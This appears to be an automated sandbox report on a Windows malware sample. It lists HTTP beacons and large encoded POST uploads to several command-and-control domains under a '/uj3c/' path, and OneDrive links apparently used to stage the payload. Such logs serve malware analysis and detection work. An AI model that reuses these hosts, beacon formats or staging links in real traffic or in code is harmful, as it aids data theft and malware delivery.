            Source: global trafficHTTP traffic detected: GET /uj3c/?aN68=XPUturKxIt&r4S0P=nXdwAKxpMTcrQ5TaEdKYb/3fLEm5MxmqnP6pt6tXZcCcrT8F9jyrfCLZmxy8K87KDFFG HTTP/1.1Host: www.kidsfundoor.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uj3c/?aN68=XPUturKxIt&r4S0P=jp9IFxSAbKEUnISDMr23fKSuCkvCee63R6j+FOwVtZA50OWyPGwkYlgwJ8c08P9Q1FY9 HTTP/1.1Host: www.empireapothecary.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uj3c/?r4S0P=A8JZ3elzzydaQ7+MlvhsR6GCRneHcYeXHZTwnFT58BDo/ENWLDTcswSqcnTzzkhbJMnE&aN68=XPUturKxIt HTTP/1.1Host: www.moneytaoism.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uj3c/?r4S0P=A8JZ3elzzydaQ7+MlvhsR6GCRneHcYeXHZTwnFT58BDo/ENWLDTcswSqcnTzzkhbJMnE&aN68=XPUturKxIt HTTP/1.1Host: www.moneytaoism.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uj3c/?r4S0P=QpZU5iWZZ+8RnceDxX1N22UuePdp1ta0hAtWyR6NsMGaje0l6aHG9rnjt2nJUX26kpQ0&aN68=XPUturKxIt HTTP/1.1Host: www.trendiddas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uj3c/?aN68=XPUturKxIt&r4S0P=hHj17NHgKPiZmEi8MiFWNXc7sAIIGTvllA8De7wxS98Or+mtFTkVcIIMQhr+SfcB3JVi HTTP/1.1Host: www.trisuaka.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uj3c/?r4S0P=gHeddp3rEbyt6G4S2ENO5jUfv41eCHMoiHYIOJLTbAbXI9CsqM4W4jpYcdbraNUyjMQx&aN68=XPUturKxIt HTTP/1.1Host: www.nomaxdic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewIP Address: 81.169.145.158 81.169.145.158
            Source: global trafficHTTP traffic detected: POST /uj3c/ HTTP/1.1Host: www.trisuaka.xyzConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.trisuaka.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.trisuaka.xyz/uj3c/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 72 34 53 30 50 3d 75 46 58 50 6c 74 76 33 4f 4d 4b 75 6e 6c 37 76 54 46 38 4a 53 54 77 37 6f 43 6f 49 44 67 48 44 39 55 52 66 4b 49 63 49 53 4a 63 59 74 76 61 54 56 79 59 41 61 2d 4d 4d 51 52 33 75 66 65 45 55 70 39 63 54 4e 33 6f 76 4a 46 39 6c 65 53 38 68 64 74 76 63 58 45 64 54 31 43 7a 6b 37 43 46 69 44 34 30 39 52 44 4c 72 61 4f 4e 78 71 48 49 43 78 38 61 58 34 34 71 33 4c 5f 46 5a 48 6a 41 75 55 38 55 48 73 65 6b 63 6f 66 66 66 54 30 70 39 35 57 6c 73 50 70 4d 5a 6e 4e 56 52 52 7a 77 73 78 6a 57 52 64 6c 36 6c 70 49 6c 44 39 6b 76 38 61 73 57 61 4a 6c 32 78 53 67 6d 70 69 44 53 65 76 78 4e 51 6e 59 50 58 65 6e 6b 39 4c 56 66 52 59 4d 77 49 28 65 36 42 66 6d 71 2d 4d 66 59 4c 63 77 69 79 35 47 54 4f 4a 6c 34 65 38 48 37 74 49 62 28 69 45 4b 69 77 37 6d 6b 79 58 62 46 74 4d 57 37 74 38 53 41 56 42 6a 4e 53 70 6b 76 6e 50 58 61 6e 70 4f 75 59 76 33 6e 6e 37 41 5a 53 63 37 34 6e 4f 38 70 62 63 48 79 53 65 52 63 5a 65 53 78 52 67 6a 67 32 74 42 62 75 4f 79 47 4b 52 6a 45 70 75 54 32 62 33 6e 6c 74 65 63 31 46 37 51 4e 73 33 52 43 68 66 7a 51 53 31 47 38 61 44 31 72 59 65 6c 56 6e 4c 54 58 5f 37 48 52 71 39 4a 42 73 4d 4e 5a 30 32 61 35 7a 39 6d 41 54 52 56 69 58 44 6a 33 77 77 70 62 56 78 66 43 4e 6a 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: r4S0P=uFXPltv3OMKunl7vTF8JSTw7oCoIDgHD9URfKIcISJcYtvaTVyYAa-MMQR3ufeEUp9cTN3ovJF9leS8hdtvcXEdT1Czk7CFiD409RDLraONxqHICx8aX44q3L_FZHjAuU8UHsekcofffT0p95WlsPpMZnNVRRzwsxjWRdl6lpIlD9kv8asWaJl2xSgmpiDSevxNQnYPXenk9LVfRYMwI(e6Bfmq-MfYLcwiy5GTOJl4e8H7tIb(iEKiw7mkyXbFtMW7t8SAVBjNSpkvnPXanpOuYv3nn7AZSc74nO8pbcHySeRcZeSxRgjg2tBbuOyGKRjEpuT2b3nltec1F7QNs3RChfzQS1G8aD1rYelVnLTX_7HRq9JBsMNZ02a5z9mATRViXDj3wwpbVxfCNjQ).
            Source: global trafficHTTP traffic detected: POST /uj3c/ HTTP/1.1Host: www.trisuaka.xyzConnection: closeContent-Length: 36479Cache-Control: no-cacheOrigin: http://www.trisuaka.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.trisuaka.xyz/uj3c/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 72 34 53 30 50 3d 75 46 58 50 6c 70 76 6c 41 59 36 6e 34 46 6e 4d 51 32 63 47 63 43 41 35 37 69 73 39 4d 42 72 63 35 6c 42 68 4f 4a 41 31 44 39 30 30 70 66 47 2d 43 68 70 64 61 5f 39 69 4b 56 62 71 4f 76 34 4c 70 38 34 70 4e 30 45 76 59 7a 46 31 66 78 56 4d 63 50 33 66 57 6b 63 33 32 43 7a 32 32 6e 63 79 44 34 77 4c 52 44 44 37 61 5f 78 78 72 68 4d 43 35 64 61 71 79 34 72 79 47 65 6f 41 49 44 46 2d 55 38 64 61 73 63 77 63 6f 76 62 66 53 58 78 2d 28 55 4e 76 4d 4a 4e 54 73 74 56 45 45 6a 74 4c 78 6a 53 7a 64 6b 47 6c 71 2d 31 44 28 33 33 38 66 64 57 56 47 31 32 30 44 77 6e 72 70 6a 4f 50 76 78 52 45 6e 59 6e 70 65 54 6b 39 4e 31 66 63 61 72 4e 5f 70 5a 47 53 64 6c 33 55 4d 66 6b 78 62 68 75 51 35 43 43 64 65 48 51 31 7a 45 53 36 49 64 50 4d 43 71 69 30 7a 47 6b 6c 58 62 46 4a 4d 57 37 50 38 57 45 56 42 6b 5a 53 6f 43 72 6e 4a 32 61 6f 73 75 75 64 36 48 6e 46 34 77 6b 68 63 37 77 33 4f 38 68 39 63 77 53 53 66 77 73 5a 65 6e 63 48 31 7a 68 39 6a 68 62 4e 45 53 47 52 52 6a 45 62 75 52 4f 4c 33 51 39 74 65 49 68 46 38 79 31 73 78 68 43 68 44 6a 51 55 73 32 35 48 44 31 6a 55 65 6b 6c 52 4c 67 62 5f 37 56 5a 71 7a 49 42 73 50 39 5a 30 77 61 34 38 31 6a 68 71 56 79 32 58 42 69 54 4c 6e 4d 47 52 28 65 58 37 38 31 4f 5f 4d 63 44 44 63 66 6c 53 6a 56 6b 67 56 72 7a 56 67 4a 51 53 4b 64 76 34 37 51 77 65 73 53 38 4d 47 73 28 39 48 4e 64 4c 4b 6c 73 48 58 37 4e 54 6e 30 49 4e 37 6b 52 74 71 35 50 32 61 71 45 33 46 72 52 61 78 58 36 7a 47 52 31 30 61 47 36 44 33 5a 41 4f 4e 74 57 74 72 5f 70 43 35 48 57 32 6a 4c 54 53 73 44 66 65 47 5a 41 37 49 6a 30 67 68 53 31 78 6c 33 7a 4e 73 39 65 4c 57 59 6a 77 6b 47 46 33 70 35 67 66 56 4a 69 74 66 36 6a 7a 66 4b 50 6c 70 4d 57 48 31 4b 66 46 70 50 50 73 32 31 41 59 47 41 4f 73 4a 34 6d 58 33 6b 48 51 69 6a 74 41 45 70 53 4f 4c 71 75 69 64 35 56 31 41 62 4e 68 58 53 6e 5f 32 68 39 49 47 51 39 75 46 41 44 39 38 71 4b 70 79 62 5a 4e 30 35 4a 59 4e 31 38 4f 4b 61 4a 68 35 74 45 6e 44 35 6d 57 44 6c 49 66 79 58 33 57 71 41 44 52 43 76 67 6f 41 55 73 69 6e 6a 4f 31 4c 43 75 55 53 5a 65 77 6e 48 44 6c 6e 75 4c 74 32 4f 4c 39 47 30 6e 63 58 42 67 5f 57 34 66 33 76 39 45 34 69 33 57 62 65 59 55 64 50 6c 48 53 6e 72 6c 72 34 4e 45 47 76 4d 44 5f 53 69 5a 79 71 75 62 5f 61 6f 49 74 4b 56 6d 76 5a 65 78 74 6e 42 38 61 6a 30 6c 64 52 38 36 48 42 6a 39 48 6e 38 4b 59 42 2d 4c 77 65 78 79 68 32 50 32 58 6e 52 35 61 66 64 55 4b 33 41 64 50 72 2d 4e 74 7e 67 54 30 4d 30 79 68 48 6e 71 4b 4f 67 74 62 68 76 48 42 4b 4e 5a 77 63 47 78 2d 4f 71 4f 6e 72 35 58 6b 48 34 45 35 4b 51 59 4d 36 2d 7e 5f 52 79 35 54 74 6f 74 6e 6d 71 6c 45 51 67 34 4a
            Source: global trafficHTTP traffic detected: POST /uj3c/ HTTP/1.1Host: www.nomaxdic.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.nomaxdic.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.nomaxdic.com/uj3c/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 72 34 53 30 50 3d 76 46 71 6e 44 4a 62 38 4a 4b 53 6d 76 30 4a 45 72 42 64 57 36 54 30 64 75 5a 46 55 50 30 45 57 6d 41 39 4d 55 65 37 49 56 67 7a 5f 59 65 53 6e 6f 70 74 53 77 6b 73 6e 44 49 37 4b 65 66 77 77 6b 5a 4a 36 77 67 66 49 6e 65 43 68 7a 58 70 75 77 6d 31 59 75 71 51 41 69 63 73 76 62 55 50 72 61 52 4c 37 47 58 6e 50 7a 6f 54 43 43 45 52 59 31 4e 33 53 31 67 77 41 53 48 41 36 4b 75 76 6a 33 73 68 38 71 48 39 6f 45 4e 48 48 77 56 57 79 69 44 69 48 39 69 76 32 57 78 57 52 6a 47 76 6a 44 6c 6a 4c 34 6a 4a 4d 43 4c 57 45 74 69 6a 69 4c 44 47 46 66 4a 67 68 54 5f 7a 4a 7a 71 69 76 65 7a 33 33 4c 55 47 72 77 34 39 53 74 69 74 2d 36 4a 53 4b 68 56 37 54 6b 59 61 43 33 73 62 4e 76 53 4e 49 66 4f 44 33 55 76 76 35 74 49 45 6e 51 31 53 75 53 56 71 37 7a 72 64 63 75 4d 6d 4c 79 32 5a 32 69 34 6f 54 70 67 48 6d 46 67 33 59 58 6c 45 58 61 2d 33 57 30 67 70 39 6d 33 34 34 28 67 4b 42 78 6d 49 5a 4e 58 37 51 6e 32 34 6c 79 39 5a 71 45 53 4e 75 71 54 6a 37 69 71 48 73 4e 5f 55 34 69 43 5a 6c 4c 65 61 74 53 39 38 2d 28 50 6e 68 4d 45 53 78 52 79 51 6e 6e 35 68 79 55 58 4e 75 63 30 7e 51 51 53 4e 52 6a 74 6f 36 76 52 67 6a 46 51 48 44 6c 70 35 74 61 68 48 44 30 6c 63 6a 69 58 79 37 52 4c 45 36 55 61 75 72 55 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: r4S0P=vFqnDJb8JKSmv0JErBdW6T0duZFUP0EWmA9MUe7IVgz_YeSnoptSwksnDI7KefwwkZJ6wgfIneChzXpuwm1YuqQAicsvbUPraRL7GXnPzoTCCERY1N3S1gwASHA6Kuvj3sh8qH9oENHHwVWyiDiH9iv2WxWRjGvjDljL4jJMCLWEtijiLDGFfJghT_zJzqivez33LUGrw49Stit-6JSKhV7TkYaC3sbNvSNIfOD3Uvv5tIEnQ1SuSVq7zrdcuMmLy2Z2i4oTpgHmFg3YXlEXa-3W0gp9m344(gKBxmIZNX7Qn24ly9ZqESNuqTj7iqHsN_U4iCZlLeatS98-(PnhMESxRyQnn5hyUXNuc0~QQSNRjto6vRgjFQHDlp5tahHD0lcjiXy7RLE6UaurUQ).
            Source: global trafficHTTP traffic detected: POST /uj3c/ HTTP/1.1Host: www.nomaxdic.comConnection: closeContent-Length: 36479Cache-Control: no-cacheOrigin: http://www.nomaxdic.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.nomaxdic.com/uj3c/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 72 34 53 30 50 3d 76 46 71 6e 44 4d 6a 75 4e 36 7e 7a 71 6b 46 76 70 30 51 56 69 54 6b 66 76 6f 78 4c 44 57 41 4a 78 42 4e 69 4c 4c 28 66 55 6c 48 68 50 65 50 6f 73 75 68 77 77 6d 30 65 4f 64 54 4f 61 2d 4d 5f 6b 5a 78 41 77 67 54 49 67 65 72 2d 77 30 52 51 77 44 68 62 6f 4b 51 53 77 4d 73 6d 52 77 50 57 61 52 66 6a 47 58 75 43 7a 59 76 43 44 6d 5a 59 68 2d 76 62 74 67 77 5a 52 44 6b 32 56 2d 6a 2d 33 73 70 65 71 46 70 6f 44 39 62 48 78 77 65 7a 67 45 32 45 37 79 76 7a 54 78 58 42 74 6d 6a 33 44 6c 58 6c 34 69 6c 4d 46 35 69 45 74 7a 44 69 61 51 65 45 4c 70 67 6b 42 50 7a 2d 33 71 65 36 65 7a 72 7a 4c 51 28 51 7a 4e 56 53 76 53 74 5f 7e 61 44 33 32 53 62 45 33 59 75 6c 33 70 43 70 76 6e 74 51 66 4d 58 50 58 63 6e 4a 69 4b 73 42 51 7a 4b 45 43 46 71 5f 34 4c 64 39 75 4d 6d 72 79 32 5a 63 69 34 34 54 70 6a 6e 6d 46 46 37 59 42 58 38 51 44 2d 33 54 39 41 6f 36 69 33 31 44 28 67 69 72 78 6a 39 43 4d 67 44 51 68 6a 63 6c 33 38 5a 74 49 79 4e 73 6b 7a 6a 69 35 36 48 76 4e 5f 55 61 69 44 5a 31 4d 74 65 74 41 59 49 2d 34 74 28 68 4f 30 53 78 49 43 51 6c 73 5a 74 69 55 58 46 51 63 78 43 6d 51 6c 56 52 69 2d 67 36 68 51 67 6a 45 41 48 44 74 4a 34 73 4c 30 36 75 7a 56 49 4e 77 31 7e 32 62 38 64 33 5a 5a 75 67 44 4e 72 6a 6a 33 36 6b 59 37 39 78 61 41 39 5f 69 69 28 7a 58 30 67 71 52 42 57 57 28 68 55 68 31 48 39 55 55 73 41 5a 48 71 72 52 61 63 6f 32 7a 46 52 4a 70 37 51 79 4a 43 58 55 53 63 5a 45 35 4a 68 66 62 65 78 67 46 52 5a 32 43 7a 78 73 73 39 71 5f 68 71 76 50 72 63 31 77 44 43 53 55 37 6d 47 48 57 79 78 6b 78 42 7a 73 56 63 52 65 36 71 65 6f 54 62 7e 64 70 39 63 48 58 41 48 32 28 49 7e 4d 31 46 7a 48 69 74 48 58 49 6f 36 6f 51 65 54 38 6b 47 79 65 62 6b 4e 63 63 74 70 56 6c 4c 65 45 6f 74 53 78 39 55 68 6c 33 30 32 77 75 30 6c 34 6e 37 63 6d 59 67 42 51 72 36 73 4d 7a 77 37 4a 6b 67 32 59 42 43 7a 7a 67 68 5a 50 47 6a 75 55 6d 42 6a 35 52 6d 30 42 72 33 51 4d 55 61 6e 4b 71 54 76 59 76 55 64 49 73 4d 45 74 56 43 65 2d 6b 42 58 54 65 44 4b 64 44 66 74 62 78 63 64 66 68 36 45 68 54 6d 6e 51 34 65 71 49 63 6b 78 4d 38 30 51 62 77 45 4f 66 38 67 34 73 53 50 4f 52 39 62 51 44 78 33 61 38 73 7a 54 30 69 73 70 4f 31 4a 30 65 5a 70 43 56 58 37 36 49 4e 52 69 34 46 30 77 76 67 6b 36 30 6f 48 51 5a 45 62 6b 50 57 58 71 6d 32 62 50 50 54 32 49 41 6c 53 77 61 67 68 76 39 4f 48 6d 53 79 6b 59 7a 51 69 4f 74 4a 67 6f 6a 73 5f 6d 6d 57 6c 4c 71 6c 61 79 53 7e 47 64 76 71 52 59 78 75 4f 56 79 47 75 47 52 79 69 35 6c 68 6f 77 64 68 62 65 36 41 65 57 6e 56 73 66 63 77 50 35 46 6e 61 4d 4f 30 6d 28 5f 6c 5f 52 54 63 67 6e 79 4d 31 47 4d 55 7a 77 76 38 52 50 35 31 4c 71 51
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 08 Aug 2022 18:14:24 GMTContent-Type: text/htmlContent-Length: 291ETag: "62f13bce-123"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 08 Aug 2022 18:14:34 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 08 Aug 2022 18:15:12 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 280Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 72 65 6e 64 69 64 64 61 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.trendiddas.com Port 80</address></body></html>
            Source: Jwjxmakrv.exe, 00000008.00000002.323926711.0000000000820000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 0000000E.00000002.352573194.0000000000864000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: TR0627729920002.exe, Jwjxmakrv.exe.0.drString found in binary or memory: http://www.emerge.deDVarFileInfo$
            Source: rundll32.exe, 0000001D.00000002.780550685.000000000571B000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.nomaxdic.com
            Source: rundll32.exe, 0000001D.00000002.780550685.000000000571B000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.nomaxdic.com/uj3c/
            Source: Jwjxmakrv.exe, 00000008.00000002.323926711.0000000000820000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 0000000E.00000002.353337808.00000000008E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2q5ira.ph.files.1drv.com/
            Source: Jwjxmakrv.exe, 00000008.00000002.323926711.0000000000820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2q5ira.ph.files.1drv.com/9
            Source: Jwjxmakrv.exe, 0000000E.00000002.353337808.00000000008E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2q5ira.ph.files.1drv.com/dK
            Source: Jwjxmakrv.exe, 0000000E.00000003.316208412.00000000008F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2q5ira.ph.files.1drv.com/y4mAWAqMZkm6zn3dSzDj3WPCBsX3RiZWbRG2DylLyNQaP0-LRMHmuxHvvhn3WeqC6Ib
            Source: Jwjxmakrv.exe, 00000008.00000003.290900186.00000000008CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2q5ira.ph.files.1drv.com/y4mPPeb9DbMgUpTw8rgi0z9dh_H8HrzfYIqodVmKxsKtJmWk00zgJ3zu481-zwoTvTa
            Source: Jwjxmakrv.exe, 00000008.00000002.325432765.000000000089A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2q5ira.ph.files.1drv.com/y4mtTOeeswFZvEvWO7PkDWtzJAdem80ecf7E9nGL_Zv4nrGYw4XHqnwQKr6FduyLWzP
            Source: Jwjxmakrv.exe, 0000000E.00000002.353475300.000000000090D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2q5ira.ph.files.1drv.com/y4mt_L56XfeV51
            Source: Jwjxmakrv.exe, 00000008.00000002.323926711.0000000000820000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 00000008.00000002.325432765.000000000089A000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 00000008.00000003.296621597.00000000008BA000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 00000008.00000003.289435198.00000000008C6000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 0000000E.00000002.352573194.0000000000864000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 0000000E.00000003.325315312.000000000090C000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 0000000E.00000003.317690202.0000000000900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2q5ira.ph.files.1drv.com/y4mt_L56XfeV5AxASyoyGlTAONQRp7vzWLKSJ-3QlK1MqAbhWXL60OiqtjrBe3gN1xB
            Source: Jwjxmakrv.exe, 0000000E.00000003.319396319.00000000008F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2q5ira.ph.files.1drv.com/y4mzqjhhxuQPPuOmBSzbYlb6397m5X2vhHIqRXXBSV57d_1VgTXNCbbqjd0KHfm6XfB
            Source: Jwjxmakrv.exe, 0000000E.00000002.352573194.0000000000864000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/
            Source: Jwjxmakrv.exe, 00000008.00000002.323926711.0000000000820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/2A
            Source: Jwjxmakrv.exe, 0000000E.00000002.354269896.0000000003598000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21235&authkey=AEqvXl2
            Source: Jwjxmakrv.exe, 00000008.00000002.323926711.0000000000820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/k
            Source: unknownHTTP traffic detected: POST /uj3c/ HTTP/1.1Host: www.trisuaka.xyzConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.trisuaka.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.trisuaka.xyz/uj3c/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 72 34 53 30 50 3d 75 46 58 50 6c 74 76 33 4f 4d 4b 75 6e 6c 37 76 54 46 38 4a 53 54 77 37 6f 43 6f 49 44 67 48 44 39 55 52 66 4b 49 63 49 53 4a 63 59 74 76 61 54 56 79 59 41 61 2d 4d 4d 51 52 33 75 66 65 45 55 70 39 63 54 4e 33 6f 76 4a 46 39 6c 65 53 38 68 64 74 76 63 58 45 64 54 31 43 7a 6b 37 43 46 69 44 34 30 39 52 44 4c 72 61 4f 4e 78 71 48 49 43 78 38 61 58 34 34 71 33 4c 5f 46 5a 48 6a 41 75 55 38 55 48 73 65 6b 63 6f 66 66 66 54 30 70 39 35 57 6c 73 50 70 4d 5a 6e 4e 56 52 52 7a 77 73 78 6a 57 52 64 6c 36 6c 70 49 6c 44 39 6b 76 38 61 73 57 61 4a 6c 32 78 53 67 6d 70 69 44 53 65 76 78 4e 51 6e 59 50 58 65 6e 6b 39 4c 56 66 52 59 4d 77 49 28 65 36 42 66 6d 71 2d 4d 66 59 4c 63 77 69 79 35 47 54 4f 4a 6c 34 65 38 48 37 74 49 62 28 69 45 4b 69 77 37 6d 6b 79 58 62 46 74 4d 57 37 74 38 53 41 56 42 6a 4e 53 70 6b 76 6e 50 58 61 6e 70 4f 75 59 76 33 6e 6e 37 41 5a 53 63 37 34 6e 4f 38 70 62 63 48 79 53 65 52 63 5a 65 53 78 52 67 6a 67 32 74 42 62 75 4f 79 47 4b 52 6a 45 70 75 54 32 62 33 6e 6c 74 65 63 31 46 37 51 4e 73 33 52 43 68 66 7a 51 53 31 47 38 61 44 31 72 59 65 6c 56 6e 4c 54 58 5f 37 48 52 71 39 4a 42 73 4d 4e 5a 30 32 61 35 7a 39 6d 41 54 52 56 69 58 44 6a 33 77 77 70 62 56 78 66 43 4e 6a 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 